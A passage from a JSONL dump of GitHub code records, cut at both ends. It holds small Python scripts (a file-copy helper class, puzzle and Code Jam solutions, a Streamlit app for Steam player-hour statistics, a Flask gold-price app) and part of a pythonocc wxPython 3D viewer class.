(轻松获取高匿代理)',\n long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown',\n url='git@git.woa.com:yuejiaxiang/easy-proxy.git',\n packages=find_packages(),\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n ],\n install_requires=[] + INSTALL_REQUIRES,\n python_requires='>=3.6, <4',\n)\n","repo_name":"yuejiaxiang/easy-proxy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43724620043","text":"from pathlib import Path\nimport shutil\n\n#\n# 元ファイルを残してコピー先ファイルを読み書きするためのクラス\n# 1ファイルずつ作成、編集、削除することを前提として編集以外を自動化する\n#\nclass CopiedFiles:\n def __init__(self, basedir: Path, filter=None):\n # 実在するディレクトリでなければエラー\n basedir = Path(basedir)\n if not basedir.is_dir() or not basedir.exists():\n raise FileNotFoundError\n # フィルターが関数でなければエラー\n filter = filter or (lambda f: True)\n if not callable(filter):\n raise TypeError\n \n # インスタンス作成時点で条件に一致するファイルを覚えておく\n self.basedir = basedir\n self.files = [f for f in self.basedir.glob('**/*') if f.is_file() and filter(f)]\n self.openfile = None\n # 作業ディレクトリを作る(スコープから抜けるときに削除する)\n self.tempdir = Path(__file__).parent.joinpath('__files_temporary__')\n self.tempdir.mkdir(parents=True, exist_ok=True)\n\n # with構文で使えるようにする\n def __enter__(self):\n return self\n \n def __exit__(self, exc_type, exc_value, traceback):\n self.close_opened_file()\n shutil.rmtree(self.tempdir, ignore_errors=True)\n\n def __del__(self):\n self.__exit__(self)\n\n def next(self):\n self.close_opened_file()\n for file in self.files:\n self.orgfile = file\n tempfile = self.tempdir.joinpath(file.name)\n shutil.copy(file, tempfile)\n self.openfile = open(tempfile, 'r+')\n yield self.openfile\n # 終わったら忘れる\n self.files = []\n return None\n\n def close_opened_file(self):\n if self.openfile and not self.openfile.closed:\n self.openfile.close()\n # 忘れる\n self.openfile = None\n self.orgfile = None\n\n @property\n def filedir(self):\n return self.orgfile.parent if self.openfile and not self.openfile.closed else \"\"\n\n @property\n def filename(self):\n return self.orgfile.name if self.openfile and not self.openfile.closed else \"\"\n\n\n#\n# 使い方\n#\ndef usage():\n desired_files = {\n 'basedir': Path.cwd(),\n 'filter': lambda f: f.suffix == '.py'\n }\n with CopiedFiles(**desired_files) as files:\n # 1周目(有効)\n print('first')\n for file in files.next():\n print(f'directory: {files.filedir}, file: {files.filename}')\n # 2周目(無効)\n print('second')\n for file in files.next():\n print(f'directory: {files.filedir}, file: {files.filename}')\n\n\nif __name__ == '__main__':\n usage()\n","repo_name":"redgemgithub/pythonmemo","sub_path":"copied_files_class.py","file_name":"copied_files_class.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27499325518","text":"import sys\n\n\nsys.stdin = open('input.txt')\n\nN = int(input())\n\nimport collections\n\nq = collections.deque()\nfor i in range(1, N+1):\n q.append(i)\nwhile len(q) != 1:\n q.popleft()\n q.append(q.popleft())\nprint(q[0])\n\n\n","repo_name":"khjeon5328/today_algorithm","sub_path":"2021/2021.01월/8일/2164.py","file_name":"2164.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7784952987","text":"import streamlit as st\nimport pandas as pd\nimport requests\nfrom functions.parse_number_by_group_of_three import parse_number\n\nfrom functions.truncate_number import truncate\n\nst.set_page_config(\n page_title=\"Evolution des heures de jeux au cours du temps\",\n page_icon=\"📈\",\n)\n\nst.markdown(\"# Evolution des heures de jeux au cours du temps\")\n\n# Chargement des données\ndf = pd.read_csv(\"data/applicationInformation.csv\", sep=\",\", header=\"infer\", encoding=\"Latin-1\")\n# Conversion de l\"id en string\ndf[\"appid\"] = df[\"appid\"].astype(str)\n# On affiche la liste des jeux pour filtrer\noption = st.selectbox(\"Quelle jeu voulez vous voir ?\", df[\"name\"])\n# Résultat du filtre\nst.write(\"Jeux sélectionné : \", option)\n\nappName = option\nappId = df[df[\"name\"] == appName][\"appid\"].values[0]\n\n# On considère que le joueur a joué 1h par jour\nnbHourPlayedPerPlayer = 1\nnbHourPlayedPerPlayer = st.slider(\"Nombre d'heure joué par joueur : \", 1, 24, 1)\n\nif appId != \"\" and appName != \"\":\n if st.button(\"Afficher les graphiques\"):\n st.markdown(\"## Graphique des heures de jeux : \" + appName)\n \n url = \"https://api.steampowered.com/ISteamUserStats/GetNumberOfCurrentPlayers/v1/?appid=\" + appId\n resp = requests.get(url=url)\n data = resp.json()\n nbPlayerConnected = data[\"response\"][\"player_count\"]\n st.markdown(\"Nombre de joueur actuelement connecté : \" + str(nbPlayerConnected))\n imageLocation = \"https://cdn.akamai.steamstatic.com/steam/apps/\" + appId + \"/header.jpg\"\n st.markdown(\"![](\" + imageLocation + \")\")\n # On récupère le fichier des heures de jeux du jeu sélectionné\n fichierLocation = \"data/PlayerCountHistory/\" + appId + \".csv\"\n df = pd.read_csv(fichierLocation, sep=\",\", header=\"infer\", encoding=\"Latin-1\")\n # On convertit la colonne Time du type object en datetime\n df['Time'] = pd.to_datetime(df['Time'])\n # On convertit la colonne Time du format datetime en date\n df[\"Time\"] = df[\"Time\"].dt.strftime(\"%Y-%m-%d\")\n # On regroupe les heures par jours pour avoir un dataframe plus petit\n df = df.groupby(\"Time\").sum().reset_index()\n # On affiche le dataframe en tableau\n # st.dataframe(df)\n # On affiche le dataframe en courbe\n st.line_chart(df, x='Time', y=['Playercount'])\n # On calcule la totalité des heures de jeux\n total = df[\"Playercount\"].sum()\n st.markdown(\"## Total des heures de jeux : \" + str(parse_number(truncate(total))))\n # Nombre d'heures pour construire la tour Eiffel 2 ans, 2 mois et 5 jours\n nbHourToBuildEiffelTower = 2 * 365 * 24 + 2 * 30 * 24 + 5 * 24\n # Nombre d'heures pour construire une maison 10 mois\n nbHourToBuildHouse = 10 * 30 * 24\n # Nombre d'heures pour assembler un airbus a320 4 jours\n nbHourToBuildAirbusA320 = 4 * 24\n # Nombre d'heures pour construire la Grande Pyramide de Gizeh 20 ans, 4 mois et 5 jours\n nbHourToBuildGreatPyramidOfGiza = 20 * 365 * 24 + 4 * 30 * 24 + 5 * 24\n # Nombre d'heures de vie moyenne d'un humain 80 ans\n nbHourToLive = 80 * 365 * 24\n\n # On affiche le nombre de Tour Eiffel que l'on aurait pu construire\n st.markdown(\"Nombre de Tour Eiffel que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildEiffelTower)*nbHourPlayedPerPlayer))))\n # On affiche le nombre de maison que l'on aurait pu construire\n st.markdown(\"Nombre de maison que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildHouse)*nbHourPlayedPerPlayer))))\n # On affiche le nombre d'Airbus A320 que l'on aurait pu construire\n st.markdown(\"Nombre d'Airbus A320 que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildAirbusA320)*nbHourPlayedPerPlayer))))\n # On affiche le nombre de Grande Pyramide de Gizeh que l'on aurait pu construire\n st.markdown(\"Nombre de Grande Pyramide de Gizeh que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildGreatPyramidOfGiza)*nbHourPlayedPerPlayer))))\n # On affiche le nombre de vie que l'on aurait pu vivre\n st.markdown(\"Nombre de vie que l'on aurait pu vivre : \" + str(parse_number(truncate(int(total / nbHourToLive)*nbHourPlayedPerPlayer))))","repo_name":"leo-doyen/openSteamData","sub_path":"pages/📈_4_Evolution_heures_par_jeux.py","file_name":"📈_4_Evolution_heures_par_jeux.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70151635715","text":"# -*- coding: utf-8 -*-\n# @Author: JinZhang\n# @Date: 2018-11-21 11:13:33\n# @Last Modified by: JinZhang\n# @Last Modified time: 2018-11-21 12:27:09\nimport wx \nimport wx.html2\nimport webbrowser\n\nclass MyHtmlFrame(wx.Frame): \n\tdef __init__(self, parent, title): \n\t\twx.Frame.__init__(self, parent, -1, title, size = (600,400)) \n\t\t# html = wx.html2.HtmlWindow(self) \n\n\t\t# if \"gtk2\" in wx.PlatformInfo: \n\t\t# \thtml.SetStandardFonts() \n\n\t\t# dlg = wx.TextEntryDialog(self, 'Enter a URL', 'HTMLWindow') \n\n\t\t# if dlg.ShowModal() == wx.ID_OK: \n\t\t# \thtml.LoadPage(dlg.GetValue()) \n\n\t\t# wx.CallAfter(html.LoadPage, \"https://www.baidu.com/\")\n\t\t# wx.CallAfter(html.LoadFile, \"E:\\\\Project\\\\JSWorkSpace\\\\PiXiProjects\\\\PiXiJS_Test\\\\index.html\")\n\t\tbrowser = wx.html2.WebView.New(self, style=0)\n\t\twx.CallAfter(browser.LoadURL, \"http://127.0.0.1:8020/PiXiJS_Test/index.html?__hbt=1542774008894\")\n\t\t# webbrowser.open_new(\"https://www.baidu.com\")\n\t\t\napp = wx.App() \nfrm = MyHtmlFrame(None, \"Simple HTML Browser\") \nfrm.Show() \napp.MainLoop()","repo_name":"JDreamHeart/DailyCodes","sub_path":"python/wx模块相关/HTML窗口/HtmlWindow.py","file_name":"HtmlWindow.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2100956091","text":"import copy\ndef solution(key, lock):\n m = len(key[0])\n n = len(lock[0])\n y = []\n x = []\n answer = False\n def rotated(a):\n r_y = len(a)\n\n result = [[0]* r_y for _ in range(r_y)]\n\n for i in range(r_y):\n for j in range(r_y):\n result[j][r_y-i-1] = a[i][j]\n return result\n \n\n for i in range(n - m +1):\n for j in range(n -m +1):\n count =0\n \n for k in range(4):\n key = rotated(key)\n lock_copy = copy.deepcopy(lock)\n check_point = lock_copy[j:j+m][i:i+m]\n for l ,p in zip(key,check_point):\n for o in range(len(key)):\n p[o] = (l[o] + p[o])\n print(lock_copy)\n for l_check in lock_copy :\n if 0 not in l_check and 2 not in l_check:\n count +=1\n if count == len(lock):\n return True \n else:\n count = 0 \n return answer\n\n\nkey = [[0, 1, 0], [0, 1, 0], [0, 0, 0]]\nlock = [[1, 1, 1, 1], [1, 1, 1,1], [0,0, 1, 1],[1,1,1,1]]\nprint(solution(key,lock))","repo_name":"YuHyeonGeun-KOR/My-Algorithm-Journey","sub_path":"This is cote/Chapter 4.Implementation/lock&key(1).py","file_name":"lock&key(1).py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23619361041","text":"#!/usr/local/bin/pypy\nimport sys\nimport re\n\nimport codejam\n\nprob = codejam.Problem()\n\n# Program.\n\ndef answer(combinations, opposing, invoked):\n # The next few lines are evaluated only once per test case (100 times...)\n opposingregs = [re.compile('(.*%(a)s.*%(b)s|.*%(b)s.*%(a)s)' %\n {'a': l[0], 'b': l[1]}) for l in opposing]\n \n combinations = dict([(x[0:2], x[2]) for x in combinations] + [(x[0:2][::-1], x[2]) for x in combinations])\n \n output = ''\n last = ''\n for i in xrange(len(invoked)):\n output += invoked[i]\n combo = combinations.get(output[-2:])\n if not combo is None: output = output[:-2] + combo\n delete = any([r.match(output) for r in opposingregs])\n if delete: output = ''\n return str(list(output)).replace(\"'\", '')\n\ndef emptyfalse(x): return x != ''\n\nl = 0\nfor line in prob.readlines()[1:]:\n l += 1\n line = [x.strip() for x in re.split('\\d+', line)[1:]]\n if len(line) != 3: raise BaseException(l)\n prob.write_case(answer(filter(emptyfalse, line[0].split(' ')),\n filter(emptyfalse, line[1].split(' ')),\n line[2]\n ))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/960.py","file_name":"960.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3307959087","text":"from flask import Flask, render_template\nimport sqlite3\napp = Flask(__name__)\n\n\ndef get_db_connection():\n conn = sqlite3.connect('database.db')\n conn.row_factory = sqlite3.Row\n return conn\n\n\n@app.route('/gold')\ndef list():\n conn = get_db_connection()\n GOLD = conn.execute('SELECT * FROM GOLD').fetchall()\n conn.close()\n return render_template('index.html', GOLD=GOLD)\n\n\n@app.route('/laxmi-price')\ndef laxmi():\n price = {}\n conn = get_db_connection()\n laxmi = conn.execute(\n \"\"\"SELECT price FROM GOLD WHERE name='laxmi'\"\"\").fetchone()\n conn.close()\n price[\"price\"] = laxmi[\"price\"]\n return price\n\n\n@app.route('//gold')\ndef details(brand):\n details = {}\n conn = get_db_connection()\n detail = conn.execute(\n 'SELECT * FROM GOLD WHERE name=?', (brand,)).fetchall()\n conn.close()\n details[\"name\"] = detail[0][1]\n details[\"price\"] = detail[0][2]\n details[\"purity\"] = detail[0][1]\n details[\"Email\"] = detail[0][3]\n details[\"image_url\"] = detail[0][4]\n return details\n\n\n@app.route('/')\ndef main():\n return render_template('main.html')\n","repo_name":"jazeel659/FLASK-TUTORIAL","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12871560065","text":"import itertools\nimport logging\nimport os\nimport sys\nimport time\nimport warnings\nfrom typing import Set, Union\n\nimport wx\nfrom OCC.wrapper.AIS import (\n AIS_DS_Erased, AIS_DS_None, AIS_InteractiveContext, AIS_ListOfInteractive,\n AIS_SOP_NothingSelected, AIS_SOP_OneSelected, AIS_SOP_SeveralSelected,\n AIS_Shaded, AIS_Shape_SelectionMode, AIS_TOAX_Unknown, AIS_TOAX_XAxis,\n AIS_TOAX_YAxis, AIS_TOAX_ZAxis, AIS_TOI_Both, AIS_TOI_IsoU, AIS_TOI_IsoV,\n AIS_WireFrame, Handle_AIS_InteractiveObject, Handle_AIS_Shape)\nfrom OCC.wrapper.Aspect import (\n Aspect_DisplayConnection, Aspect_FM_CENTERED, Aspect_FM_NONE,\n Aspect_FM_STRETCH, Aspect_FM_TILED, Aspect_GDM_Lines, Aspect_GDM_None,\n Aspect_GDM_Points, Aspect_GFM_CORNER1, Aspect_GFM_CORNER2,\n Aspect_GFM_CORNER3, Aspect_GFM_CORNER4, Aspect_GFM_DIAG1, Aspect_GFM_DIAG2,\n Aspect_GFM_HOR, Aspect_GFM_NONE, Aspect_GFM_VER, Aspect_GT_Rectangular,\n Aspect_TOL_SOLID, Aspect_TOTP_RIGHT_LOWER)\nfrom OCC.wrapper.Graphic3d import (\n Graphic3d_AspectFillArea3d, Graphic3d_ClipPlane, V3d_GOURAUD)\nfrom OCC.wrapper.Image import Image_AlienPixMap\nfrom OCC.wrapper.MeshVS import (\n Handle_MeshVS_Mesh, MeshVS_DA_EdgeColor, MeshVS_DA_InteriorColor,\n MeshVS_DA_MarkerColor, MeshVS_DMF_Shading, MeshVS_DMF_Shrink,\n MeshVS_DMF_WireFrame)\nfrom OCC.wrapper.OpenGl import OpenGl_GraphicDriver\nfrom OCC.wrapper.Prs3d import (\n Handle_Prs3d_Drawer, Prs3d_Drawer, Prs3d_IsoAspect,\n Prs3d_TypeOfHighlight_LocalDynamic, Prs3d_TypeOfHighlight_LocalSelected,\n Prs3d_TypeOfHighlight_Selected)\nfrom OCC.wrapper.Quantity import (\n Quantity_Color, Quantity_NOC_BLACK, Quantity_NOC_GRAY75,\n Quantity_NOC_GRAY80, Quantity_NOC_WHITE)\nfrom OCC.wrapper.StdSelect import Handle_StdSelect_BRepOwner\nfrom OCC.wrapper.TColStd import (\n TColStd_ListOfInteger, TColStd_SequenceOfInteger)\nfrom OCC.wrapper.TCollection import (\n TCollection_AsciiString, TCollection_ExtendedString)\nfrom OCC.wrapper.TopAbs import (\n TopAbs_COMPOUND, TopAbs_EDGE, TopAbs_FACE, TopAbs_SHELL, TopAbs_SOLID,\n TopAbs_VERTEX, TopAbs_WIRE)\nfrom OCC.wrapper.V3d import (\n V3d_Viewer, V3d_Xneg, V3d_Xpos, V3d_XposYposZpos, V3d_Yneg,\n V3d_Ypos, V3d_ZBUFFER, V3d_Zneg, V3d_Zpos)\nfrom OCC.wrapper.gp import gp_Dir, gp_Pln, gp_Pnt\n\nfrom OCC.gui import OCCDeprecationWarning\nfrom OCC.gui.camera import Camera\nfrom OCC.gui.events import (\n create_left_click_background_event, create_left_click_object_event,\n create_right_click_background_event, create_right_click_object_event)\nfrom OCC.gui.interactive_objects import (\n make_ais_coloredshape, make_ais_text_label, make_ais_trihedron)\nfrom OCC.gui.utils import concurrency_guard\nfrom OCC.utils.utilities import QuantityColor_rgb, py_QuantityColor\n\n# TODO (PP): uncomment when vector export is supported again\n# from OCC.gui.enums import ext_Graphic3d_ExportFormat\n\nVALID_BITMAP_EXTENSIONS = [\"bmp\", \"png\", \"gif\", \"jpg\"]\nVALID_VECTOR_EXTENSIONS = []\nVALID_IMAGE_EXTENSIONS = VALID_BITMAP_EXTENSIONS + VALID_VECTOR_EXTENSIONS\n\nVALID_BITMAP_EXTENSIONS_SET = frozenset(VALID_BITMAP_EXTENSIONS)\nVALID_VECTOR_EXTENSIONS_SET = frozenset(VALID_VECTOR_EXTENSIONS)\n\n__all__ = [\"ViewerWindow\", \"Viewer\"]\n\nNAME_TO_SEL_MODE = {\n \"vertices\": AIS_Shape_SelectionMode(TopAbs_VERTEX),\n \"edges\": AIS_Shape_SelectionMode(TopAbs_EDGE),\n \"wires\": AIS_Shape_SelectionMode(TopAbs_WIRE),\n \"faces\": AIS_Shape_SelectionMode(TopAbs_FACE),\n \"shells\": AIS_Shape_SelectionMode(TopAbs_SHELL),\n \"solids\": AIS_Shape_SelectionMode(TopAbs_SOLID),\n \"compounds\": AIS_Shape_SelectionMode(TopAbs_COMPOUND),\n \"default\": 0,\n}\nSEL_MODE_TO_NAME = dict(zip(NAME_TO_SEL_MODE.values(),\n NAME_TO_SEL_MODE.keys()))\n\n\n# TODO (RvD): user now in charge of not re-displaying the same object.\n# /todo consider caching calls to display()\n# TODO (RvD): Remove wx.ClientDC and use OCC AIS_RubberBand from 7.0.0.\nclass Viewer(wx.Panel):\n \"\"\"Viewer panel for wx-backend. Supports mouse rotation, panning, zooming,\n etc. Background style can be one of 3 modes:\n\n 1. single color mode, e.g. \"red\" or (255, 0, 0).\n :meth:`set_background_color`.\n 2. gradient color mode, e.g. (\"red\", \"blue\") or ((255, 0, 0), (0, 0, 255)).\n :meth:`set_background_color_gradient`.\n 3. background image mode: specify filename of background image.\n :meth:`set_background_image`.\n\n .. note:: Once a mode has been set, it not possible to switch between\n modes. Any attempt to switch mode, will be ignored.\n \"\"\"\n #: the default number of U and V isoparameters displayed\n ISOS = 0, 0\n #: show isolines on planar faces?\n ISOS_ON_PLANE = True\n #: highlight selected objects?\n HIGHLIGHT_SELECTED = False\n #: Show edges of\n DRAW_FACE_BOUNDARIES = True\n #: size of triedron as factor of windows size\n TRIEDRON_SCALE = 0.1\n #: title for V3d_Viewer object\n V3D_VIEWER_TITLE = \"viewer\"\n #: top color of background gradient\n BG_RGB_COLOR_TOP = 153, 204, 255\n #: bottom color of background gradient\n BG_RGB_COLOR_BOT = 0, 128, 255\n #: latency for drawing rubberband boxes in seconds\n LATENCY = 0.04\n #: adapt to default value for OpenCascade\n DEFAULT_DISPLAY_PRIORITY = 5\n #: Should iso-lines be created on the triangulation?\n ISO_ON_TRIANGULATION = True\n #: Color for selection of the faces for >1D shapes (Default: #FF7900)\n DEFAULT_SELECTION_COLOR = (0xFF, 0x79, 0x00)\n #: Color of the edges on selection (Default: `Quantity_NOC_GRAY80`)\n DEFAULT_SELECTION_EDGE_COLOR = Quantity_NOC_GRAY80\n #: Color of the edges on a highlight. (Default: #EAA864)\n DEFAULT_HIGHLIGHT_COLOR = (0xEA, 0xA8, 0x64)\n #: Color of the edges when highlighting a subshape. (Default: #EAA864)\n DEFAULT_SUBSHAPE_HIGHLIGHT_COLOR = DEFAULT_HIGHLIGHT_COLOR\n #: Color of the faces/edges when selecting a subshape. (Default: #EAA864)\n DEFAULT_SUBSHAPE_SELECTION_COLOR = DEFAULT_SELECTION_COLOR\n #: Presentation mode for trihedrons.\n DEFAULT_TRIHEDRON_DISPLAY_MODE = 'wireframe'\n\n py_Aspect_GradientFillMethod = {\n None: Aspect_GFM_NONE,\n \"horizontal\": Aspect_GFM_HOR,\n \"vertical\": Aspect_GFM_VER,\n \"diag1\": Aspect_GFM_DIAG1,\n \"diag2\": Aspect_GFM_DIAG2,\n \"corner1\": Aspect_GFM_CORNER1,\n \"corner2\": Aspect_GFM_CORNER2,\n \"corner3\": Aspect_GFM_CORNER3,\n \"corner4\": Aspect_GFM_CORNER4}\n\n py_Aspect_FillMethod = {\n None: Aspect_FM_NONE,\n \"centered\": Aspect_FM_CENTERED,\n \"tiled\": Aspect_FM_TILED,\n \"stretched\": Aspect_FM_STRETCH}\n\n py_Aspect_GridDrawMode = {\n None: Aspect_GDM_None,\n \"lines\": Aspect_GDM_Lines,\n \"points\": Aspect_GDM_Points}\n\n py_DisplayMode = {\n \"wireframe\": 0,\n \"shaded\": 1,\n \"quick_hlr\": 2,\n \"exact_hlr\": 3}\n\n py_DisplayModeMesh = {\n \"shrink\": MeshVS_DMF_Shrink,\n \"shaded\": MeshVS_DMF_Shading,\n 'wireframe': MeshVS_DMF_WireFrame}\n\n DisplayMode_py = {\n 0: \"wireframe\",\n 1: \"shaded\",\n 2: \"quick_hlr\",\n 3: \"exact_hlr\"}\n\n py_AIS_TOAX = {\n None: AIS_TOAX_Unknown,\n \"x\": AIS_TOAX_XAxis,\n \"y\": AIS_TOAX_YAxis,\n \"z\": AIS_TOAX_ZAxis}\n\n class _UnsetStyle(object):\n __slots__ = ()\n\n UNSET_STYLE = _UnsetStyle() # flag used to unset a style\n\n def __init__(self, parent, logger=None):\n wx.Panel.__init__(self, parent)\n self.logger = logger or logging.getLogger(self.__class__.__name__)\n #: :type: OCC.V3d.Handle_V3d_Viewer\n self._v3d_viewer = None\n #: :type: OCC.V3d.Handle_V3d_View\n self._v3d_view = None\n #: :type: OCC.AIS.Handle_AIS_InteractiveContext\n self._ais_context = None\n #: :type: OCC.PrsMgr.PrsMgr_PresentationManager\n self._prsmgr_presentationmanager = None\n #: :type: ZLayers\n self.zlayers = None\n #: :type: dict\n self._keymap = {}\n #: :type: list[Handle_Graphic3d_ClipPlane]\n self._clipplanes = []\n #: :type: (int, int)\n self._drag_x1_y1 = 0, 0\n #: :type: float\n self._drag_t1 = -1.0\n #: :type: wx.ClientDC\n self._dc = None\n #: :type: (float, float, float, float)\n self._selected_area = None\n #: :type: bool\n self._dragged = False\n #: One of None, 'uniform', 'gradient' or 'image\".\n # :type: str\n self._bg_mode = None\n #: Default background color\n self._default_background_color = None\n #: last used path to background image\n self._bg_image = None\n #: :type: bool\n self.triedron = True\n\n # Colors below are a tuple. The first item is the value the user sets,\n # we need to return this to the user when he asks for it again. The\n # second item is the one for internal use (Quantity_Color)\n # (color, quantity_color)\n self._selection_color = (None, None)\n # (color, quantity_color)\n self._selection_edge_color = (None, None)\n # (color, quantity_color)\n self._highlight_color = (None, None)\n\n if sys.platform == 'linux':\n top_level_parent = self.TopLevelParent\n was_shown = top_level_parent.IsShown()\n\n # To force the window being created, so that we can get the handle\n # we show the window\n top_level_parent.Show()\n while not self.GetHandle():\n # although EVT_WINDOW_CREATE notifies the event of the window\n # being created, testing if we can get a Handle seems to be\n # more reliable. Creating multiple frames with the same app\n # does not fire EVT_WINDOW_CREATE again.\n wx.SafeYield()\n\n # Restore IsShown state to what it was before we changed it\n top_level_parent.Show(was_shown)\n while not top_level_parent.IsShown() == was_shown:\n wx.SafeYield()\n\n self.Bind(wx.EVT_SIZE, self.OnSize)\n self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)\n self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)\n self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)\n self.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)\n self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)\n self.Bind(wx.EVT_MIDDLE_DOWN, self.OnMiddleDown)\n self.Bind(wx.EVT_MOTION, self.OnMotion)\n self.Bind(wx.EVT_MOUSEWHEEL, self.OnWheelScroll)\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)\n self.Bind(wx.EVT_PAINT, self.OnPaint)\n self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroy)\n self.Bind(wx.EVT_ENTER_WINDOW, self.on_enter_window)\n\n self.left_m_down = False\n self.right_m_down = False\n\n self.init_viewer()\n self.init_layers()\n self.init_lights()\n self.init_background()\n self.init_display_mode()\n self.init_highlighting_defaults()\n self.init_triedron()\n self.init_keymap()\n self.init_dc()\n\n #: :type: OCC.gui.camera.Camera\n self.camera = Camera(self._v3d_view.Camera())\n\n def get_window_handle(self):\n hnd = self.GetHandle()\n if not hnd:\n raise RuntimeError(\"Couldn't get window handle\")\n return hnd\n\n def OnDestroy(self, evt):\n # We need to destroy the view before the window is closed, otherwise\n # it will somehow try to update it when we ask it to close, but that\n # will happen after the window is indeed gone.\n self.remove_all(False)\n\n # TODO (RvD): Test if OpenGl_View is required or Graphic3d_CView is fine.\n def init_viewer(self):\n # window.SetVirtual(True)\n connection = Aspect_DisplayConnection().handle\n driver = OpenGl_GraphicDriver(connection).handle\n title = TCollection_ExtendedString(self.V3D_VIEWER_TITLE)\n title = title.ToExtString()\n viewer = V3d_Viewer(driver, title).handle\n view = viewer.CreateView()\n hnd = self.get_window_handle()\n\n if sys.platform == 'linux':\n from OCC.wrapper.Xw import Xw_Window\n window = Xw_Window(connection, hnd).handle\n else:\n from OCC.wrapper.WNT import WNT_Window\n window = WNT_Window(hnd, Quantity_NOC_BLACK).handle\n\n view.SetWindow(window)\n\n if not window.IsMapped():\n window.Map()\n\n self._v3d_view = view\n self._v3d_viewer = viewer\n self.zlayers = ZLayers(viewer)\n\n self._ais_context = context = AIS_InteractiveContext(viewer).handle\n\n # we need the default value of DEVIATION for the style resets\n # here nothing has happened yet.\n self._DEFAULT_DEVIATION_COEFFICIENT = context.DeviationCoefficient()\n\n self._prsmgr_presentationmanager = context.MainPrsMgr()\n self._default_background_color = view.BackgroundColor()\n\n def init_layers(self):\n \"\"\"Template to override for different layer setup.\n\n .. attention:: on overriding, either call this method\n (``super().init_layers()``) or at least ensure that one new\n Z-layer is added to this view via :attr:`zlayers` and a call to\n :meth:`ZLayers.add_layer``. The side-effect garantuees proper\n functioning of OCC's default ``Graphic3d_ZLayerId_Top`` layer (e.g.\n Manipulator object depends on this and would otherwise not highlight\n on hover).\n \"\"\"\n self.zlayers.add_layer()\n\n def init_lights(self):\n self._v3d_viewer.SetDefaultLights()\n self._v3d_viewer.SetLightOn()\n\n def init_background(self):\n self.set_background_color_gradient(self.BG_RGB_COLOR_TOP,\n self.BG_RGB_COLOR_BOT)\n\n def init_display_mode(self):\n context = self._ais_context\n v3d_view = self._v3d_view\n\n # ---- shading with edges ----\n context.SetDisplayMode(AIS_Shaded, False)\n v3d_view.SetShadingModel(V3d_GOURAUD)\n drawer: Handle_Prs3d_Drawer = context.DefaultDrawer()\n drawer.SetFaceBoundaryDraw(self.DRAW_FACE_BOUNDARIES)\n\n # ---- isos ----\n self.set_isos(*self.ISOS)\n context.IsoOnPlane(self.ISOS_ON_PLANE)\n context.IsoOnTriangulation(self.ISO_ON_TRIANGULATION)\n\n def init_highlighting_defaults(self):\n context = self._ais_context\n\n # ---- selecting ----\n self.selection_color = self.DEFAULT_SELECTION_COLOR\n self.selection_edge_color = self.DEFAULT_SELECTION_EDGE_COLOR\n self.subshape_selection_color = self.DEFAULT_SUBSHAPE_SELECTION_COLOR\n\n # ---- hilighting ----\n context.SetToHilightSelected(self.HIGHLIGHT_SELECTED)\n self.highlight_color = self.DEFAULT_HIGHLIGHT_COLOR\n self.subshape_highlight_color = self.DEFAULT_SUBSHAPE_HIGHLIGHT_COLOR\n\n def _update_selection_highlighting(self):\n drawer: Handle_Prs3d_Drawer = self._ais_context.HighlightStyle(\n Prs3d_TypeOfHighlight_Selected)\n\n drawer.SetDisplayMode(-1) # Currently active display mode.\n\n selection_color = self._selection_color[1]\n # fill color:\n if selection_color:\n fill_style = drawer.BasicFillAreaAspect()\n if fill_style.IsNull():\n fill_style = Graphic3d_AspectFillArea3d().handle\n drawer.SetBasicFillAreaAspect(fill_style)\n\n fill_style.SetInteriorColor(selection_color)\n\n edge_color = self._selection_edge_color[1]\n if edge_color:\n drawer.SetColor(edge_color) # edge color\n\n @property\n def selection_color(self):\n return self._selection_color[0]\n\n @selection_color.setter\n def selection_color(self, color):\n \"\"\"Set selection color.\n\n :param color: color to show on selection, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n self._selection_color = (color, q_color)\n self._update_selection_highlighting()\n\n @property\n def selection_edge_color(self):\n return self._selection_edge_color[0]\n\n @selection_edge_color.setter\n def selection_edge_color(self, color):\n \"\"\"Color of the boundary edges.\n\n :param color: color to show on selection, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n self._selection_edge_color = (color, q_color)\n self._update_selection_highlighting()\n\n @property\n def subshape_selection_color(self):\n return 